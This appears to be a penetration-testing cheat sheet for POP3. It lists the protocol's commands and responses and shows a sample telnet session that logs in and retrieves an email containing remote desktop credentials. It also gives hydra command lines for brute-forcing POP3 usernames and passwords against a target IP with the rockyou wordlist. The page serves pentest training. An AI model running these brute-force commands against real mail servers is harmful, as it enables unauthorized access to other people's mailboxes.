Skip to content

POP3 BASICS

  1. Purpose: An application layer protocol used for retrieving email messages from a mail server.
  2. Port: Operates on TCP port 110.
  3. Model: Follows a client-server model, where the client connects to the mail server to retrieve emails.

POP3 COMMANDS

  1. USER: Identifies the username or email address of the client.
  2. PASS: Provides the password for authentication.
  3. LIST: Retrieves a list of all emails on the server, along with their sizes.
  4. RETR: Retrieves a specific email from the server based on its index.
  5. DELE: Marks a specific email for deletion on the server.
  6. NOOP: No operation command, used to keep the connection alive.
  7. QUIT: Terminates the POP3 session and closes the connection.

BRUTE-FORCING POP3 CREDENTIALS

  1. Unknown User hydra -L user.txt -p "Password" -f [TARGET-IP] pop3
  2. Unknown Password hydra -l user -P /opt/rockyou.txt -f [TARGET-IP] pop3
  3. Unknown User and Password hydra -L user.txt -P /opt/rockyou.txt -f [TARGET-IP] pop3
  4. Different Port hydra -l user -P /opt/rockyou.txt -f [TARGET-IP] pop3 -s 9999

POP3 RESPONSES

  1. +OK: Indicates a successful response from the server.
  2. -ERR: Indicates an error response from the server.

EXAMPLE

hackfast@kali:~$ telnet [IP-ADRESS] 110
 +OK alpha POP3 service (JAMES POP3 Server 2.3.2) active
 USER mrrobot
 +OK
 PASS secretpassword
 +OK Welcome mrrobot

 list

 +OK 2 1807
 1 786
 2 1021

 retr 1

 +OK Retrieving message
 From: mrrobot@hackfa.st
 Hello Mr. Robot,

 Below is your remote desktop login info. Please remember it!
 username: mrrobot
 password: S3cur3P@ssw0rd